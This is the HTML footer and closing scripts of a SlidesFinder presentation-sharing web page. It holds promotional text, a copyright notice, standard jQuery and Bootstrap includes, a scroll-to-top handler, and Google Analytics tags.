Word Templates</a></li> </ul> </div> </div> <div class="row hallmark center-block"> <p><small> Slidesfinder is a sharing website for PowerPoint presentations search and share. Find your interest in the form of powerpoint presentations on slidesfinder and save your valuable time . On Slidesfinder you get presentations from our huge library of professional ppt presentations. We believe in making your search INFORMATIVE and FUN. Find your best ppt presentation from a pool of PowerPoint presentations stacked under important industry categories like business & management, heath & Wellness,eduction & training etc. We provide unique informative PowerPoint presentation for marketers, presenters and educationists. These professional PowerPoint presentations are uploaded by professionals from across numerous industry segments.These ppt presentations are available for FREE download.</small> </p> <p><small> Not just finding your interest, but facilitate you broadcast your interest. We have created this platform for easy sharing of PowerPoint presentations, ensuring that these presentations get maximum exposure. Create your slidesfinder account and upload PowerPoint presentations for free, share on social media platforms and BUILD YOUR CROWD WITH PRESENTATION !!</small> </p> <p><small> The Great Buddha says, "Share your knowledge.It’s a way to achieve immortality"! So, start sharing knowledge and we are here to make that immortal !!</small> </p> </div> <div class="row hallmark center-block"> <p><strong>© 2013-2022 SlidesFinder. All rights reserved.</strong></p> <p>Re-productivity of content are not allowed. Without prior written permission from author, commercial use of any content is illegal.</p> </div> </div> <!--footer--> </div> <!--main container--> <script src="https://www.slidesfinder.com/javascript/jquery-3.1.1.min.js"></script> <script src="https://www.slidesfinder.com/js/lazysizes.min.js"></script> <script src="https://www.slidesfinder.com/jquery/purecookie.js"></script> <script src="https://www.slidesfinder.com/javascript/bootstrap.min.js"></script> <script src="https://www.slidesfinder.com/javascript/ajax-hendler.js"></script> <script> $(document).ready(function () { $('[data-toggle="tooltip"]').tooltip(); }); </script> <script> // ===== Scroll to Top ==== // $(window).scroll(function () { if ($(this).scrollTop() >= 1000) { // If page is scrolled more than 50px $('#return-to-top').fadeIn(200); // Fade in the arrow } else { $('#return-to-top').fadeOut(200); // Else fade out the arrow } }); $('#return-to-top').click(function () { // When arrow is clicked $('body,html').animate({ scrollTop: 0 // Scroll to top of body }, 500); }); </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="63539351" /> </div></form> <script> (function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r].l = 1 * new Date(); a = s.createElement(o), m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m) })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga'); ga('create', 'UA-45270795-1', 'slidesfinder.com'); ga('send', 'pageview'); </script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-4NDRL08MFE"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'G-4NDRL08MFE'); </script> <!-- Global site tag (gtag.js) - Google Analytics --> </body> </html>